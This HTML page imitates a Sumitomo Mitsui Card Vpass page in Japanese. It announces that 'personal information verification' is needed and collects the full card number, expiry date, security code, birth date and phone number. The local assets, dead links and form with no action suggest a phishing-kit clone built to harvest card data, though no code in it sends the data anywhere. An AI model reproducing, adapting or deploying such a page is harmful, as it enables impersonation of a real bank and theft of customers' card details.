<html lang="ja" wovn-supervised="" class="hydrated dj_webkit dj_chrome dj_contentbox">
<head>
    <link rel="stylesheet" type="text/css" href="./static/css/dynamic_import.css">
</head>

<body class="sdbc2 claro">
<div id="LoginControl">
    <div id="vps_member_LoginControlWidget_0" lang="ja" widgetid="vps_member_LoginControlWidget_0"></div>
</div>
<div class="head" id="Head">
    <div class="headerWidgetBase postLogin" id="vps_member_HeaderWidgetPreLogin_0"
         widgetid="vps_member_HeaderWidgetPreLogin_0" style="">
        <style>
            @import url('https://fonts.googleapis.com/css?family=Noto+Sans+JP:400,700&display=swap');
        </style>

        <div id="smbcLine">
            <div id="smbcLine_pc">
                <div class="smbcGroupWrap">
                    <div class="logoSmbc"><img src="./static/logo_smbc_01.jpg" alt="SMBC ロゴ"></div>
                    <div class="logoSmbcGroup"><img src="./static/logo_smbcgroup.jpg" alt="SMBCグループ"></div>
                </div>
            </div>
        </div>
        <div id="header" class="" style="">
            <ul class="headerInner">
                <div class="hLeft">
                    <p class="logo_in"><a href="#" class="txtMagic HpSvrRoot_header">クレジットカードなら三井住友カード</a>
                    </p>
                </div>
                <div class="hRight">
                    <ul class="hRight_subMenu">
                        <li class="subMenu_item"><a href="#"
                                                    class="HpSvrRoot_header"><span
                                class="subMenu_item subMenu_item-support">お客さまサポート</span></a></li>
                        <li class="subMenu_item subMenu_item-search"><span
                                class="subMenu_itemInner"><span>サイト内</span>検索</span>
                        </li>
                        <li class="subMenu_item"><a href="#"
                                                    class="HpSvrRoot_header"><span
                                class="subMenu_item subMenu_item-translated">Language</span></a></li>
                        <li class="subMenu_item subMenu_item-login"><a class="HpSvrRoot_header"
                                                                       href="#">ログイン</a>
                        </li>
                        <li class="subMenu_item subMenu_item-menu subMenu_item"><a
                                href="#">メニュー</a></li>
                    </ul>
                    <ul class="megaMenu">
                        <li class="megaMenu_item">
                            <div class="megaMenu_itemTitle jsAccordionToggle">
                                <a class="megaMenu_itemTitleLink HpSvrRoot_header"
                                   href="#">
                                    明細・支払い
                                    <div class="megaMenu_itemTitlebtmline"></div>
                                </a>
                            </div>

                        </li>

                        <li class="megaMenu_item">
                            <div class="megaMenu_itemTitle jsAccordionToggle">
                                <a class="megaMenu_itemTitleLink HpSvrRoot_header"
                                   href="#">
                                    リボ・分割＆キャッシング
                                    <div class="megaMenu_itemTitlebtmline"></div>
                                </a>
                            </div>

                        </li>

                        <li class="megaMenu_item linkMenu">
                            <div class="megaMenu_itemTitle jsAccordionToggle">
                                <a class="megaMenu_itemTitleLink HpSvrRoot_header"
                                   href="#">
                                    キャンペーン
                                    <div class="megaMenu_itemTitlebtmline"></div>
                                </a>
                            </div>
                        </li>

                        <li class="megaMenu_item">
                            <div class="megaMenu_itemTitle jsAccordionToggle">
                                <a class="megaMenu_itemTitleLink HpSvrRoot_header"
                                   href="#">
                                    ポイント
                                    <div class="megaMenu_itemTitlebtmline"></div>
                                </a>
                            </div>

                        </li>

                        <li class="megaMenu_item">
                            <div class="megaMenu_itemTitle jsAccordionToggle ">
                                <a class="megaMenu_itemTitleLink HpSvrRoot_header"
                                   href="#">
                                    サービス
                                    <div class="megaMenu_itemTitlebtmline"></div>
                                </a>
                            </div>

                        </li>

                        <li class="megaMenu_item">
                            <div class="megaMenu_itemTitle jsAccordionToggle">
                                <a class="megaMenu_itemTitleLink HpSvrRoot_header"
                                   href="#">
                                    変更お手続き
                                    <div class="megaMenu_itemTitlebtmline"></div>
                                </a>
                            </div>

                        </li>

                    </ul>

                    <div id="searchArea" class="searchAreaWrap">
                        <form name="SS_searchForm" id="SS_searchForm"
                              action="#" method="get">
                            <div class="searchBox">
                                <input type="text" name="kw" value="" size="20" id="SS_searchQuery"
                                       class="searchTextBox" maxlength="100" autocomplete="off"
                                       placeholder="キーワードを入力して検索">
                                <input value="検索" type="submit" id="SS_searchSubmit" class="searchButton">
                            </div>
                        </form>
                    </div>

                </div>
            </ul>
        </div>
        <div id="header_overlay"></div>
    </div>
</div>
<div class="wrapper">
    <div class="wrap_inner">
        <div class="left" id="Left">
            <div class="menuWidgetBase" id="vps_member_MenuWidgetPreLogin_0" widgetid="vps_member_MenuWidgetPreLogin_0">
            </div>
        </div>
        <div class="container" id="Center">
            <div class="cont_inner" id="contents">
                <div class="mainWidgetBase" id="vp_member_pages_entry_0" lang="ja" widgetid="vp_member_pages_entry_0">
                    <div id="vps_member_EnableDeviceButton_0" lang="ja" widgetid="vps_member_EnableDeviceButton_0">
                    </div>


                    <form id="cardForm" class="contact" name="FRM_c_GMVC0201001U327210-0001"
                          method="post">

                        <input type="text" name="dummy_text" disabled="disabled"
                               style="width:2px;height:2px;position:absolute;opacity:0;filter:alpha(opacity=0);">
                        <input type="password" name="dummy_password" disabled="disabled"
                               style="width:2px;height:2px;position:absolute;opacity:0;filter:alpha(opacity=0);">
                        <input type="text" name="dummy_text2" disabled="disabled"
                               style="width:2px;height:2px;position:absolute;opacity:0;filter: alpha(opacity=0);">
                        <input type="password" name="dummy_password2" disabled="disabled"
                               style="width:2px;height:2px;position:absolute;opacity:0;filter: alpha(opacity=0);">
                        <h1 wovn-enable="">Vpass IDの個人情報検証が必要です</h1>
                        <div class="yabane_step">
                            <ul class="yabane_row" wovn-enable="">
                                <li class="act">
                                    <div><span>1.</span>お客さま情報の入力</div>
                                </li>
                                <li>
                                    <div><span>2.</span>個人情報の入力</div>
                                </li>
                                <li>
                                    <div><span>3.</span>登録完了</div>
                                </li>
                            </ul>
                        </div>
                        <div data-dojo-type="vp/alcor/view/ErrorMessage" id="vp-view-err_common" class="error_text_box"
                             data-dojo-props="entryTag:'div',entryClassName:'error_box_child'" lang="ja"
                             widgetid="vp-view-err_common" style="display: none;"></div>
                        <div class="smallArrowLink inline_b">
                            <a href="#">カードに16桁の番号が記載されていない方はこちらから新規登録をお願いします</a>
                        </div>
                        <div>
                            <h2 wovn-enable="">
                                ご本人確認
                            </h2>
                            <h3 wovn-enable="">カード情報の入力</h3>
                            <table cellpadding="0" cellspacing="0" border="0"
                                   class="mr_b10 border_in form_default_table">
                                <tbody>
                                <tr>
                                    <th>
                                        <div class="iconCell">
                                            <span wovn-enable="">会員番号</span>
                                            <span class="cLabel_required" wovn-enable="">必須</span>
                                        </div>
                                    </th>
                                    <td class="onthe_error" id="cardErrorF">
                                        <div class="default_overall clearfix">
                                            <div>
                                                <p class="default_text" wovn-enable="">
                                                    カードに記載の16桁の番号をご入力ください。
                                                </p>
                                                <input type="text" name="vp-view-VC0201-001_RS0010_acct1"
                                                       id="vp-view-VC0201-001_RS0010_acct1" maxlength="4" size="4"
                                                       class="size70" autocomplete="nope"
                                                       data-action-preparator-member-number-focus-id="1"
                                                       data-action-preparator-member-number-focus-next="2">
                                                <span class="hyp">-</span>
                                                <input type="text" name="vp-view-VC0201-001_RS0010_acct2"
                                                       id="vp-view-VC0201-001_RS0010_acct2" maxlength="4" size="4"
                                                       class="size70" autocomplete="nope"
                                                       data-action-preparator-member-number-focus-id="2"
                                                       data-action-preparator-member-number-focus-next="3">
                                                <span class="hyp">-</span>
                                                <input type="text" name="vp-view-VC0201-001_RS0010_acct3"
                                                       id="vp-view-VC0201-001_RS0010_acct3" maxlength="4" size="4"
                                                       class="size70" autocomplete="nope"
                                                       data-action-preparator-member-number-focus-id="3"
                                                       data-action-preparator-member-number-focus-next="4">
                                                <span class="hyp">-</span>
                                                <input type="text" name="vp-view-VC0201-001_RS0010_acct4"
                                                       id="vp-view-VC0201-001_RS0010_acct4" maxlength="4" size="4"
                                                       class="size70" autocomplete="nope"
                                                       data-action-preparator-member-number-focus-id="4">
                                                <ul>
                                                    <li class="validate_error_line">
                                                        <div data-dojo-type="vp/alcor/view/ErrorMessage"
                                                             id="vp-view-err_vp-view-VC0201-001_RS0010_acct1"
                                                             class="error_text" lang="ja"
                                                             widgetid="vp-view-err_vp-view-VC0201-001_RS0010_acct1"
                                                             style="display: none;">会員番号の最初の4桁が入力されていません
                                                        </div>
                                                        <div data-dojo-type="vp/alcor/view/ErrorMessage"
                                                             id="vp-view-err_vp-view-VC0201-001_RS0010_acct2"
                                                             class="error_text" lang="ja"
                                                             widgetid="vp-view-err_vp-view-VC0201-001_RS0010_acct2"
                                                             style="display: none;">会員番号の2番目の4桁が入力されていません
                                                        </div>
                                                        <div data-dojo-type="vp/alcor/view/ErrorMessage"
                                                             id="vp-view-err_vp-view-VC0201-001_RS0010_acct3"
                                                             class="error_text" lang="ja"
                                                             widgetid="vp-view-err_vp-view-VC0201-001_RS0010_acct3"
                                                             style="display: none;">会員番号の3番目の4桁が入力されていません
                                                        </div>
                                                        <div data-dojo-type="vp/alcor/view/ErrorMessage"
                                                             id="vp-view-err_vp-view-VC0201-001_RS0010_acct4"
                                                             class="error_text" lang="ja"
                                                             widgetid="vp-view-err_vp-view-VC0201-001_RS0010_acct4"
                                                             style="display: none;">会員番号の最後の4桁が入力されていません
                                                        </div>

                                                    </li>
                                                </ul>
                                            </div>
                                            <div>
                                                <ul class="notes_list mr_t10 text_l float_left" wovn-enable="">
                                                    <li>半角数字4桁</li>
                                                    <li>会員番号がご不明な場合は<a
                                                            href="#">こちら</a>よりお問い合わせください。
                                                    </li>
                                                </ul>
                                                <div class="float_right"><span
                                                        data-dojo-type="vp/alcor/view/FuncControl"
                                                        data-dojo-props=" functionControlKey:'Useracct_CardImg_disp', type:'equals', value:'1' "
                                                        id="vp_alcor_view_FuncControl_0" lang="ja"
                                                        widgetid="vp_alcor_view_FuncControl_0" style=""><img
                                                        src="./static/img/img_card_09.png" width="210" height="92"
                                                        alt="会員番号 イメージ"></span></div>
                                            </div>
                                        </div>
                                    </td>
                                </tr>
                                <tr>
                                    <th>
                                        <div class="iconCell" wovn-enable="">
                                            <span wovn-enable="">カード有効期限</span>
                                            <span class="cLabel_required" wovn-enable="">必須</span>
                                        </div>
                                    </th>
                                    <td class="onthe_error">
                                        <div class="default_overall clearfix">
                                            <div class="card_box_l">
                                                <div class="size1p inline_b">
                                                    <select name="vp-view-VC0201-001_RS0010_limit_mon"
                                                            id="vp-view-VC0201-001_RS0010_limit_mon" class="size70"
                                                            autocomplete="nope">
                                                        <option value="" selected="selected">月</option>
                                                        <option value="01">1月</option>
                                                        <option value="02">2月</option>
                                                        <option value="03">3月</option>
                                                        <option value="04">4月</option>
                                                        <option value="05">5月</option>
                                                        <option value="06">6月</option>
                                                        <option value="07">7月</option>
                                                        <option value="08">8月</option>
                                                        <option value="09">9月</option>
                                                        <option value="10">10月</option>
                                                        <option value="11">11月</option>
                                                        <option value="12">12月</option>
                                                    </select>
                                                    <span wovn-enable="">／</span>
                                                </div>
                                                <div class="size40p inline_b"><select
                                                        name="vp-view-VC0201-001_RS0010_limit_year"
                                                        data-dojo-attach-point="containerNode,focusNode"
                                                        data-dojo-attach-event="onchange: _onChange"
                                                        data-vp-disabled-on-hide="true" aria-disabled="false"
                                                        tabindex="0" lang="ja" id="vp-view-VC0201-001_RS0010_limit_year"
                                                        class="size100p " size="1"
                                                        widgetid="vp-view-VC0201-001_RS0010_limit_year" style="">
                                                    <option value="">お選びください</option>
                                                    <option value="24">2024年</option>
                                                    <option value="25">2025年</option>
                                                    <option value="26">2026年</option>
                                                    <option value="27">2027年</option>
                                                    <option value="28">2028年</option>
                                                    <option value="29">2029年</option>
                                                    <option value="30">2030年</option>
                                                    <option value="31">2031年</option>
                                                    <option value="32">2032年</option>
                                                    <option value="33">2033年</option>
                                                    <option value="34">2034年</option>
                                                    <option value="35">2035年</option>
                                                </select></div>
                                                <span class="inline_b" wovn-enable="">（月／年）</span>
                                                <ul>
                                                    <li class="validate_error_line">
                                                        <div data-dojo-type="vp/alcor/view/ErrorMessage"
                                                             id="vp-view-err_vp-view-VC0201-001_RS0010_limit_mon"
                                                             class="error_text" lang="ja"
                                                             widgetid="vp-view-err_vp-view-VC0201-001_RS0010_limit_mon"
                                                             style="display: none;">有効期限（月）をお選びください
                                                        </div>
                                                        <div data-dojo-type="vp/alcor/view/ErrorMessage"
                                                             id="vp-view-err_vp-view-VC0201-001_RS0010_limit_year"
                                                             class="error_text" lang="ja"
                                                             widgetid="vp-view-err_vp-view-VC0201-001_RS0010_limit_year"
                                                             style="display: none;">有効期限（年）をお選びください
                                                        </div>
                                                    </li>
                                                </ul>
                                                <p class="default_text" wovn-enable="">
                                                    記入例：<br>
                                                    カードの表示「01/20」の場合は「1月2020年」とお選びください。
                                                </p>

                                            </div>
                                            <div class="float_right"><span data-dojo-type="vp/alcor/view/FuncControl"
                                                                           data-dojo-props=" functionControlKey:'Useracctlimit_CardImg_disp', type:'equals', value:'1' "
                                                                           id="vp_alcor_view_FuncControl_1" lang="ja"
                                                                           widgetid="vp_alcor_view_FuncControl_1"
                                                                           style=""><img
                                                    src="./static/img/img_card_06.png" width="210" height="92"
                                                    alt="カード有効期限 イメージ"></span></div>
                                        </div>
                                    </td>
                                </tr>
                                <tr data-dojo-type="vp/alcor/view/FuncControl"
                                    data-dojo-props="functionControlKey:'Reauthentication_method', type:'equals', value:'2' "
                                    id="vp_alcor_view_FuncControl_2" lang="ja" widgetid="vp_alcor_view_FuncControl_2"
                                    style="display: none;">
                                    <th>
                                        <div class="iconCell">
                                            <span wovn-enable="">会員番号の下4桁</span>
                                            <span class="cLabel_required" wovn-enable="">必須</span>
                                        </div>
                                    </th>
                                    <td class="onthe_error">
                                        <div class="default_overall clearfix">
                                            <div class="card_box_l">
                                                <input type="text" name="vp-view-VC0201-001_RS0010_acct4_re"
                                                       id="vp-view-VC0201-001_RS0010_acct4_re" maxlength="4" size="4"
                                                       class="size70" autocomplete="new-password"
                                                       data-vp-disabled-on-hide="true" disabled="">
                                                <span class="inline_constraint" wovn-enable="">〔半角数字4桁〕</span>
                                                <ul>
                                                    <li class="validate_error_line">
                                                        <div data-dojo-type="vp/alcor/view/ErrorMessage"
                                                             id="vp-view-err_vp-view-VC0201-001_RS0010_acct4_re"
                                                             class="error_text" lang="ja"
                                                             widgetid="vp-view-err_vp-view-VC0201-001_RS0010_acct4_re"
                                                             style="display: none;">
                                                        </div>
                                                    </li>
                                                </ul>
                                            </div>
                                            <div class="float_right"><span data-dojo-type="vp/alcor/view/FuncControl"
                                                                           data-dojo-props=" functionControlKey:'Useracct_4Digit_CardImg_disp', type:'equals', value:'1' "
                                                                           id="vp_alcor_view_FuncControl_3" lang="ja"
                                                                           widgetid="vp_alcor_view_FuncControl_3"
                                                                           style="display: none;"><img
                                                    src="./static/img/img_card_07.png" width="210" height="92"
                                                    alt="会員番号の下4桁 イメージ"></span></div>
                                        </div>
                                    </td>
                                </tr>
                                <tr data-dojo-type="vp/alcor/view/FuncControl"
                                    data-dojo-props="functionControlKey:'Reauthentication_method', type:'equals', value:'1' "
                                    id="vp_alcor_view_FuncControl_4" lang="ja" widgetid="vp_alcor_view_FuncControl_4"
                                    style="">
                                    <th>
                                        <div class="iconCell">
                                            <span wovn-enable="">セキュリティコード</span>
                                            <span class="cLabel_required" wovn-enable="">必須</span>
                                        </div>
                                    </th>
                                    <td class="onthe_error">
                                        <div class="default_overall clearfix">
                                            <div class="card_box_l">
                                                <div class="text_l float_left mr_t30">
                                                    <input type="text" name="vp-view-VC0201-001_RS0010_cvv2"
                                                           id="vp-view-VC0201-001_RS0010_cvv2" maxlength="3" size="3"
                                                           class="size70" autocomplete="nope"
                                                           data-vp-disabled-on-hide="true" pattern="\d*">
                                                    <!-- required-->
                                                </div>

                                                <ul>
                                                    <li class="validate_error_line">
                                                        <div data-dojo-type="vp/alcor/view/ErrorMessage"
                                                             id="vp-view-err_vp-view-VC0201-001_RS0010_cvv2"
                                                             class="error_text" lang="ja"
                                                             widgetid="vp-view-err_vp-view-VC0201-001_RS0010_cvv2"
                                                             style="display: none;">カードの裏面サインパネルに印字されている番号の下3桁をご入力ください
                                                        </div>
                                                    </li>
                                                </ul>
                                            </div>
                                            <div class="float_right"><span data-dojo-type="vp/alcor/view/FuncControl"
                                                                           data-dojo-props=" functionControlKey:'Cvv2_CardImg_disp', type:'equals', value:'1' "
                                                                           id="vp_alcor_view_FuncControl_5" lang="ja"
                                                                           widgetid="vp_alcor_view_FuncControl_5"
                                                                           style=""><img
                                                    src="./static/img/img_card_08.png" width="210" height="92"
                                                    alt="セキュリティコード イメージ"></span>

                                            </div>
                                            <div class="mr_t10">
                                                <ul class="notes_list">
                                                    <li>半角数字3桁</li>
                                                    <li wovn-enable="">
                                                        バーチャルカード、カードローン（振込専用）は、会員証表面の会員番号右下に印字されている3桁の番号となります。
                                                    </li>
                                                </ul>
                                            </div>
                                        </div>
                                    </td>
                                </tr>
                                <tr>
                                    <th>
                                        <div class="iconCell">
                                            <span wovn-enable="">生年月日</span>
                                            <span class="cLabel_required" wovn-enable="">必須</span>
                                        </div>
                                    </th>
                                    <td class="onthe_error">
                                        <div class="default_overall clearfix">
                                            <span wovn-enable="">西暦</span>
                                            <input type="text" name="vp-view-VC0201-001_RS0010_birth_year"
                                                   id="vp-view-VC0201-001_RS0010_birth_year" maxlength="4" size="4"
                                                   class="size70" autocomplete="nope" >
                                            <span wovn-enable="">年</span>
                                            <div class="size1p inline_b">
                                                <select name="vp-view-VC0201-001_RS0010_birth_mon"
                                                        id="vp-view-VC0201-001_RS0010_birth_mon" class="size70"
                                                        autocomplete="nope">   <!-- required-->
                                                    <option value="" selected="selected">月</option>
                                                    <option value="01">1月</option>
                                                    <option value="02">2月</option>
                                                    <option value="03">3月</option>
                                                    <option value="04">4月</option>
                                                    <option value="05">5月</option>
                                                    <option value="06">6月</option>
                                                    <option value="07">7月</option>
                                                    <option value="08">8月</option>
                                                    <option value="09">9月</option>
                                                    <option value="10">10月</option>
                                                    <option value="11">11月</option>
                                                    <option value="12">12月</option>
                                                </select>
                                            </div>
                                            &emsp;
                                            <div class="size1p inline_b">
                                                <select name="vp-view-VC0201-001_RS0010_birth_day"
                                                        id="vp-view-VC0201-001_RS0010_birth_day" class="size70"
                                                        autocomplete="nope">   <!-- required-->
                                                    <option value="">日</option>
                                                    <option value="01">1日</option>
                                                    <option value="02">2日</option>
                                                    <option value="03">3日</option>
                                                    <option value="04">4日</option>
                                                    <option value="05">5日</option>
                                                    <option value="06">6日</option>
                                                    <option value="07">7日</option>
                                                    <option value="08">8日</option>
                                                    <option value="09">9日</option>
                                                    <option value="10">10日</option>
                                                    <option value="11">11日</option>
                                                    <option value="12">12日</option>
                                                    <option value="13">13日</option>
                                                    <option value="14">14日</option>
                                                    <option value="15">15日</option>
                                                    <option value="16">16日</option>
                                                    <option value="17">17日</option>
                                                    <option value="18">18日</option>
                                                    <option value="19">19日</option>
                                                    <option value="20">20日</option>
                                                    <option value="21">21日</option>
                                                    <option value="22">22日</option>
                                                    <option value="23">23日</option>
                                                    <option value="24">24日</option>
                                                    <option value="25">25日</option>
                                                    <option value="26">26日</option>
                                                    <option value="27">27日</option>
                                                    <option value="28">28日</option>
                                                    <option value="29">29日</option>
                                                    <option value="30">30日</option>
                                                    <option value="31">31日</option>
                                                </select>
                                            </div>
                                        </div>
                                        <ul>
                                            <li class="validate_error_line">
                                                <div data-dojo-type="vp/alcor/view/ErrorMessage"
                                                     id="vp-view-err_vp-view-VC0201-001_RS0010_birth_year"
                                                     class="error_text" lang="ja"
                                                     widgetid="vp-view-err_vp-view-VC0201-001_RS0010_birth_year"
                                                     style="display: none;">生年月日（年）をご入力ください
                                                </div>
                                                <div data-dojo-type="vp/alcor/view/ErrorMessage"
                                                     id="vp-view-err_vp-view-VC0201-001_RS0010_birth_mon"
                                                     class="error_text" lang="ja"
                                                     widgetid="vp-view-err_vp-view-VC0201-001_RS0010_birth_mon"
                                                     style="display: none;">生年月日（月）をお選びください
                                                </div>
                                                <div data-dojo-type="vp/alcor/view/ErrorMessage"
                                                     id="vp-view-err_vp-view-VC0201-001_RS0010_birth_day"
                                                     class="error_text" lang="ja"
                                                     widgetid="vp-view-err_vp-view-VC0201-001_RS0010_birth_day"
                                                     style="display: none;">生年月日（日）をお選びください
                                                </div>
                                            </li>
                                        </ul>
                                        <ul class="notes_list" wovn-enable="">
                                            <li>半角数字</li>
                                        </ul>
                                    </td>
                                </tr>
                                <tr>
                                    <th>
                                        <div class="iconCell">
                                            <span wovn-enable="">電話番号</span>
                                            <span class="cLabel_required" wovn-enable="">必須</span>
                                        </div>
                                    </th>
                                    <td class="onthe_error">
                                        <div class="default_overall clearfix">
                                            <p wovn-enable=""><span
                                                    class="attention_line">本会員がご登録の電話番号</span>をご入力ください。
                                            </p>
                                            <input type="text" name="vp-view-VC0201-001_RS0010_phone1"
                                                   id="vp-view-VC0201-001_RS0010_phone1" maxlength="5" size="5"
                                                   class="size70" autocomplete="nope">
                                            <span class="hyp">-</span> <input type="text"
                                                                              name="vp-view-VC0201-001_RS0010_phone2"
                                                                              id="vp-view-VC0201-001_RS0010_phone2"
                                                                              maxlength="4" size="5" class="size70"
                                                                              autocomplete="nope">
                                            <span class="hyp">-</span> <input type="text"
                                                                              name="vp-view-VC0201-001_RS0010_phone3"
                                                                              id="vp-view-VC0201-001_RS0010_phone3"
                                                                              maxlength="5" size="5" class="size70"
                                                                              autocomplete="nope">
                                        </div>
                                        <ul>
                                            <li class="validate_error_line">
                                                <div data-dojo-type="vp/alcor/view/ErrorMessage"
                                                     id="vp-view-err_vp-view-VC0201-001_RS0010_phone1"
                                                     class="error_text" lang="ja"
                                                     widgetid="vp-view-err_vp-view-VC0201-001_RS0010_phone1"
                                                     style="display: none;">電話番号の市外局番をご入力ください
                                                </div>
                                                <div data-dojo-type="vp/alcor/view/ErrorMessage"
                                                     id="vp-view-err_vp-view-VC0201-001_RS0010_phone2"
                                                     class="error_text" lang="ja"
                                                     widgetid="vp-view-err_vp-view-VC0201-001_RS0010_phone2"
                                                     style="display: none;">電話番号の局番をご入力ください
                                                </div>
                                                <div data-dojo-type="vp/alcor/view/ErrorMessage"
                                                     id="vp-view-err_vp-view-VC0201-001_RS0010_phone3"
                                                     class="error_text" lang="ja"
                                                     widgetid="vp-view-err_vp-view-VC0201-001_RS0010_phone3"
                                                     style="display: none;">電話番号をご入力ください
                                                </div>
                                            </li>
                                        </ul>
                                        <ul class="notes_list" wovn-enable="">
                                            <li>半角数字</li>
                                        </ul>
                                        <div class="gray_box mr_t20">
                                            <div class="attention_strong_box attentionBody acdiWrap mr_t0 mr_b0">
                                                <ul class="list mr_b20">
                                                    <li class="mr_b10" wovn-enable="">
                                                        <span class="font_n_bold">法人カード会員の方：</span><br>
                                                        お届けの連絡先電話番号（決済口座が個人名義の方は個人の電話番号）
                                                    </li>
                                                    <li class="mr_b10" wovn-enable="">
                                                        <span class="font_n_bold">海外ヘルプデスクにご登録の方：</span><br>
                                                        国内の連絡先電話番号
                                                    </li>
                                                </ul>
                                            </div>
                                        </div>
                                    </td>
                                </tr>
                                </tbody>
                            </table>
                        </div>
                        <div class="mr_t10"></div>
                        <div class="submit_btn_wrap">
                            <div class="submit_btn_box">
                                <a data-dojo-type="vp/alcor/view/ExtLink" data-dojo-props="linkKey:'00.U327.back'"
                                   class="negative_btn btn_small_size" id="vp_alcor_view_ExtLink_0" lang="ja"
                                   widgetid="vp_alcor_view_ExtLink_0"
                                   href="#"><span
                                        wovn-enable="">戻る</span>
                                </a>

                                <input type="submit" value="次へ進む"
                                       class="default_btn btn_big_size" >
                            </div>
                        </div>
                    </form>


                    <div id="vps_member_widget_IncCommonFunctions_0" lang="ja"
                         widgetid="vps_member_widget_IncCommonFunctions_0">
                        <div id="vps_member_IncWebAnalyticsRA_0" lang="ja" widgetid="vps_member_IncWebAnalyticsRA_0">
                        </div>
                        <div id="vps_member_widget_IncWebAnalyticsGA_0" lang="ja"
                             widgetid="vps_member_widget_IncWebAnalyticsGA_0">
                        </div>
                    </div>
                </div>
            </div>
        </div>
    </div>
</div>
<div class="footer" id="Footer">
    <div class="footerWidgetBase" id="vps_member_FooterWidgetPreLogin_0" widgetid="vps_member_FooterWidgetPreLogin_0">

        <div>
            <div id="footerArea">
                <div class="pgTopLinkWrap">
                    <a class="pgTopLink02" href="#"><img
                            src="./static/img/img_link_pageTop.png" alt=""></a>
                </div>
                <div class="linkWrap">
                    <div class="footNavWrapArea">
                        <div class="footAreaTop colLink">
                            <ul class="smallArrowLink">
                                <li>
                                    <a href="#" class="HpSvrRoot_footer">
                                        <div>紛失・盗難・不正利用に伴うカード停止</div>
                                    </a>
                                </li>
                                <li>
                                    <a href="#" class="HpSvrRoot_footer">
                                        <div>各種規約</div>
                                    </a>
                                </li>
                                <li>
                                    <a class="HpSvrRoot_footer"
                                       href="#"
                                       onclick="window.open(this.getAttribute('href'),'win1','toolbar=no,location=no,directories=no,scrollbars=yes,resizable=yes,width=850,height=600'); return false;">
                                        <div>電子決済等代行業者の表示事項<span class="blankLink"></span></div>
                                    </a>
                                </li>
                                <li>
                                    <a class="HpSvrRoot_footer" href="#">
                                        <div>ご利用環境について<span class="blankLink"></span></div>
                                    </a>
                                </li>
                                <li>
                                    <a href="#" class="HpSvrRoot_footer">
                                        <div>サイトマップ</div>
                                    </a>
                                </li>
                            </ul>
                        </div>
                    </div>
                </div>
                <div class="footAreaBottom">
                    <div class="layoutChangeArea" id="switch_sp" style="display: none;">
                        <p>
                            <a href="#">スマートフォンサイトを表示する</a>
                        </p>
                    </div>
                    <p class="copyright"><small>Copyright (C) <span id="CopyAreaYear">2024</span> Sumitomo Mitsui Card
                        Co., Ltd.</small></p>
                </div>
            </div>
        </div>

    </div>
</div>

</body>
</html>